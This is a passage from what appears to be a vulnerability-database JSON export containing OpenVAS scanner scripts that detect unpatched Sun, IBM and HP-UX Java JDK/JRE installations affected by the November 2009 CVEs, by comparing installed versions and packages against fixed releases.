JDK/JRE version 1.3.1_27\n http://java.sun.com/j2se/1.3/download.html\";\ntag_summary = \"This host is installed with Sun Java JDK/JRE and is prone to\n multiple vulnerabilities.\";\n\nif(description)\n{\n script_id(800975);\n script_version(\"$Revision: 7699 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-11-08 13:10:34 +0100 (Wed, 08 Nov 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-13 15:48:12 +0100 (Fri, 13 Nov 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-3877\", \"CVE-2009-3876\", \"CVE-2009-3875\", \"CVE-2009-3873\",\n \"CVE-2009-3874\", \"CVE-2009-3872\", \"CVE-2009-3871\", \"CVE-2009-3869\",\n \"CVE-2009-3868\", \"CVE-2009-3867\");\n script_bugtraq_id(36881);\n script_name(\"Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (Linux)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/37231\");\n script_xref(name : \"URL\" , value : \"http://java.sun.com/javase/6/webnotes/6u17.html\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2009/3131\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_java_prdts_detect_lin.nasl\");\n script_require_keys(\"Sun/Java/JRE/Linux/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\njreVer = get_kb_item(\"Sun/Java/JRE/Linux/Ver\");\nif(!jreVer){\n exit(0);\n}\n\nif(jreVer)\n{\n # Check for 1.3 < 1.3.1_27, 1.4 < 1.4.2_24, 1.5 < 1.5.0_22 (5 Update 22),\n # and 1.6 < 1.6.0_17 (6 Update 17)\n if(version_in_range(version:jreVer, test_version:\"1.3\", test_version2:\"1.3.1.26\")||\n version_in_range(version:jreVer, test_version:\"1.4\", test_version2:\"1.4.2.23\")||\n version_in_range(version:jreVer, test_version:\"1.5\", test_version2:\"1.5.0.21\")||\n version_in_range(version:jreVer, test_version:\"1.6\", test_version2:\"1.6.0.16\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1643.\n\nThe IBM 1.4.2 SR13-FP3 Java release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2009-3867, CVE-2009-3868, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875,\nCVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.4.2-ibm are advised to upgrade to these updated\npackages, which contain the IBM 1.4.2 SR13-FP3 Java release. All running\ninstances of IBM Java must be restarted for this update to take effect.", "modified": "2018-04-06T00:00:00", "published": "2009-12-14T00:00:00", "id": "OPENVAS:136141256231066469", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066469", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1643", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1643.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1643 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1643.\n\nThe IBM 1.4.2 SR13-FP3 Java release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2009-3867, CVE-2009-3868, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875,\nCVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.4.2-ibm are advised to upgrade to these updated\npackages, which contain the IBM 1.4.2 SR13-FP3 Java release. All running\ninstances of IBM Java must be restarted for this update to take effect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66469\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-14 23:06:43 +0100 (Mon, 14 Dec 2009)\");\n script_cve_id(\"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:1643\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1643.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n script_xref(name : \"URL\" , value : \"http://www.ibm.com/developerworks/java/jdk/alerts/\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm\", rpm:\"java-1.4.2-ibm~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-demo\", rpm:\"java-1.4.2-ibm-demo~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-devel\", rpm:\"java-1.4.2-ibm-devel~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-jdbc\", rpm:\"java-1.4.2-ibm-jdbc~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-plugin\", rpm:\"java-1.4.2-ibm-plugin~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-src\", rpm:\"java-1.4.2-ibm-src~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm\", rpm:\"java-1.4.2-ibm~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-demo\", rpm:\"java-1.4.2-ibm-demo~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-devel\", rpm:\"java-1.4.2-ibm-devel~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-javacomm\", rpm:\"java-1.4.2-ibm-javacomm~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-jdbc\", rpm:\"java-1.4.2-ibm-jdbc~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-plugin\", rpm:\"java-1.4.2-ibm-plugin~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-src\", rpm:\"java-1.4.2-ibm-src~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm\", rpm:\"java-1.4.2-ibm~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-demo\", rpm:\"java-1.4.2-ibm-demo~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-devel\", rpm:\"java-1.4.2-ibm-devel~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-javacomm\", rpm:\"java-1.4.2-ibm-javacomm~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-jdbc\", rpm:\"java-1.4.2-ibm-jdbc~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-plugin\", rpm:\"java-1.4.2-ibm-plugin~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-src\", rpm:\"java-1.4.2-ibm-src~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:40:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "This host is installed with Sun Java JDK/JRE and is prone to\n Multiple Vulnerabilities.", "modified": "2018-12-04T00:00:00", "published": "2009-11-13T00:00:00", "id": "OPENVAS:1361412562310800972", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800972", "type": "openvas", "title": "Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_sun_java_jre_mult_vuln_nov09_win.nasl 12635 2018-12-04 08:00:20Z cfischer $\n#\n# Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (Windows)\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800972\");\n script_version(\"$Revision: 12635 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-04 09:00:20 +0100 (Tue, 04 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-13 15:48:12 +0100 (Fri, 13 Nov 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-3877\", \"CVE-2009-3876\", \"CVE-2009-3875\", \"CVE-2009-3873\",\n \"CVE-2009-3874\", \"CVE-2009-3872\", \"CVE-2009-3871\", \"CVE-2009-3869\",\n \"CVE-2009-3868\", \"CVE-2009-3867\");\n script_bugtraq_id(36881);\n script_name(\"Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (Windows)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/37231\");\n script_xref(name:\"URL\", value:\"http://java.sun.com/javase/6/webnotes/6u17.html\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2009/3131\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_java_prdts_detect_portable_win.nasl\");\n script_mandatory_keys(\"Sun/Java/JDK_or_JRE/Win/installed\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows remote attacker to execute arbitrary code,\n gain escalated privileges, bypass security restrictions and cause denial\n of service attacks inside the context of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Sun Java JDK/JRE 6 prior to 6 Update 17\n\n Sun Java JDK/JRE 5 prior to 5 Update 22\n\n Sun Java JDK/JRE 1.4.x prior to 1.4.2_24\n\n Sun Java JDK/JRE 1.3.x prior to 1.3.1_27 on Windows.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws occur due to,\n\n - Error when decoding 'DER' encoded data and parsing HTTP headers.\n\n - Error when verifying 'HMAC' digests.\n\n - Integer overflow error in the 'JPEG JFIF' Decoder while processing\n malicious image files.\n\n - A buffer overflow error in the 'setDiffICM()' and 'setBytePixels()'\n functions in the Abstract Window Toolkit (AWT).\n\n - Unspecified error due to improper parsing of color profiles of images.\n\n - A buffer overflow error due to improper implementation of the\n 'HsbParser.getSoundBank()' function.\n\n - Three unspecified errors when processing audio or image files.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to JDK/JRE version 6 Update 17 or later.\n\n Upgrade to JDK/JRE version 5 Update 22\n\n Upgrade to JDK/JRE version 1.4.2_24\n\n Upgrade to JDK/JRE version 1.3.1_27.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Sun Java JDK/JRE and is prone to\n Multiple Vulnerabilities.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nver = get_kb_item(\"Sun/Java/JRE/Win/Ver\");\nif(!ver)\n ver = get_kb_item(\"Sun/Java/JDK/Win/Ver\");\n\nif(!ver || ver !~ \"^1\\.[3-6]\\.\")\n exit(0);\n\nif(version_in_range(version:ver, test_version:\"1.3\", test_version2:\"1.3.1.26\")||\n version_in_range(version:ver, test_version:\"1.4\", test_version2:\"1.4.2.23\")||\n version_in_range(version:ver, test_version:\"1.5\", test_version2:\"1.5.0.21\")||\n version_in_range(version:ver, test_version:\"1.6\", test_version2:\"1.6.0.16\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-11-13T12:59:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "This host is installed with Sun Java JDK/JRE and is prone to\n Multiple Vulnerabilities.", "modified": "2017-11-08T00:00:00", "published": "2009-11-13T00:00:00", "id": "OPENVAS:800972", "href": "http://plugins.openvas.org/nasl.php?oid=800972", "type": "openvas", "title": "Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_sun_java_jre_mult_vuln_nov09_win.nasl 7699 2017-11-08 12:10:34Z santu $\n#\n# Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (Windows)\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation allows remote attacker to execute arbitrary code,\n gain escalated privileges, bypass security restrictions and cause denial\n of service attacks inside the context of the affected system.\n Impact Level: System/Application.\";\ntag_affected = \"Sun Java JDK/JRE 6 prior to 6 Update 17\n Sun Java JDK/JRE 5 prior to 5 Update 22\n Sun Java JDK/JRE 1.4.x prior to 1.4.2_24\n Sun Java JDK/JRE 1.3.x prior to 1.3.1_27 on Windows.\";\ntag_insight = \"Multiple flaws occur due to,\n - Error when decoding 'DER' encoded data and parsing HTTP headers.\n - Error when verifying 'HMAC' digests.\n - Integer overflow error in the 'JPEG JFIF' Decoder while processing\n malicious image files.\n - A buffer overflow error in the 'setDiffICM()' and 'setBytePixels()'\n functions in the Abstract Window Toolkit (AWT).\n - Unspecified error due to improper parsing of color profiles of images.\n - A buffer overflow error due to improper implementation of the\n 'HsbParser.getSoundBank()' function.\n - Three unspecified errors when processing audio or image files.\";\ntag_solution = \"Upgrade to JDK/JRE version 6 Update 17 or later.\n http://java.sun.com/javase/downloads/index.jsp\n OR\n Upgrade to JDK/JRE version 5 Update 22\n http://java.sun.com/javase/downloads/index_jdk5.jsp\n OR\n Upgrade to JDK/JRE version 1.4.2_24\n http://java.sun.com/j2se/1.4.2/download.html\n OR\n Upgrade to JDK/JRE version 1.3.1_27\n http://java.sun.com/j2se/1.3/download.html\";\ntag_summary = \"This host is installed with Sun Java JDK/JRE and is prone to\n Multiple Vulnerabilities.\";\n\nif(description)\n{\n script_id(800972);\n script_version(\"$Revision: 7699 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-11-08 13:10:34 +0100 (Wed, 08 Nov 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-13 15:48:12 +0100 (Fri, 13 Nov 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-3877\", \"CVE-2009-3876\", \"CVE-2009-3875\", \"CVE-2009-3873\",\n \"CVE-2009-3874\", \"CVE-2009-3872\", \"CVE-2009-3871\", \"CVE-2009-3869\",\n \"CVE-2009-3868\", \"CVE-2009-3867\");\n script_bugtraq_id(36881);\n script_name(\"Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (Windows)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/37231\");\n script_xref(name : \"URL\" , value : \"http://java.sun.com/javase/6/webnotes/6u17.html\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2009/3131\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_java_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Sun/Java/JDK_or_JRE/Win/installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\ni = 0;\nif(jreVer = get_kb_item(\"Sun/Java/JRE/Win/Ver\")) {\n version[i] = jreVer;\n i++;\n}\n\nif(jdkVer = get_kb_item(\"Sun/Java/JDK/Win/Ver\")) {\n version[i] = jdkVer;\n}\n\nforeach ver (version)\n{\n if(ver)\n {\n # Check for 1.3 < 1.3.1_27, 1.4 < 1.4.2_24, 1.5 < 1.5.0_22 (5 Update 22),\n # and 1.6 < 1.6.0_17 (6 Update 17)\n if(version_in_range(version:ver, test_version:\"1.3\", test_version2:\"1.3.1.26\")||\n version_in_range(version:ver, test_version:\"1.4\", test_version2:\"1.4.2.23\")||\n version_in_range(version:ver, test_version:\"1.5\", test_version2:\"1.5.0.21\")||\n version_in_range(version:ver, test_version:\"1.6\", test_version2:\"1.6.0.16\"))\n {\n security_message(0);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-23T13:05:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "Check for the Version of Java", "modified": "2018-01-23T00:00:00", "published": "2010-02-15T00:00:00", "id": "OPENVAS:1361412562310835225", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310835225", "type": "openvas", "title": "HP-UX Update for Java HPSBUX02503", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Java HPSBUX02503\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote Increase in privilege\n Denial of Service and other vulnerabilities\";\ntag_affected = \"Java on\n HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 6.0.05 or earlier \n HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 5.0.18 or earlier \n HP-UX B.11.11, B.11.23, B.11.31 running HP Java SDK and RTE 1.4.2.23 or \n earlier\";\ntag_insight = \"Potential security vulnerabilities have been identified in Java Runtime \n Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These \n vulnerabilities could allow remote unauthorized access, privilege \n escalation, and Denial of Service (DoS)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01997760\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.835225\");\n script_version(\"$Revision: 8495 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-23 08:57:49 +0100 (Tue, 23 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-02-15 16:07:49 +0100 (Mon, 15 Feb 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"HPSBUX\", value: \"02503\");\n script_cve_id(\"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n script_name(\"HP-UX Update for Java HPSBUX02503\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of Java\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.31\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.24.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 